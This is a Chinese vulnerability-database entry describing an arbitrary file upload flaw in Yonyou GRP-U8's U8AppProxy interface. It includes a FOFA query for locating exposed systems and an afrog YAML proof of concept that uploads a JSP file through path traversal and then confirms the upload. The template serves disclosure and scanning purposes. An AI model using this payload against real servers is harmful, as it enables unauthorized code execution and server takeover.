yonyou-grp-u8-app-proxy-uploadfile: 用友 GRP-U8 U8AppProxy 任意文件上传

日期: 2025-09-01 | 影响软件: 用友GRP-U8 U8AppProxy | POC: 已公开

漏洞描述

用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。 fofa: title="用友GRP-U8行政事业内控管理软件"

PoC代码[已公开]

id: yonyou-grp-u8-app-proxy-uploadfile

info:
  name: 用友 GRP-U8 U8AppProxy 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |
    用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
    fofa: title="用友GRP-U8行政事业内控管理软件"
  reference:
    - https://mp.weixin.qq.com/s/vrfBOj62Wq54of4rcY-pIQ

set:
  randstr: randomLowercase(5)
  randbody: randomLowercase(28)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../{{randstr}}
      headers:
        Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
      body: "\
        --WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\r\n\
        Content-Type: image/png\r\n\
        \r\n\
        <% out.println(\"{{randbody}}\");%>\r\n\
        --WebKitFormBoundary{{rboundary}}-\r\n\
        "
    expression: response.status == 500
  r1:
    request:
      method: GET
      path: /{{randstr}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-app-proxy-uploadfile.yaml

相关漏洞推荐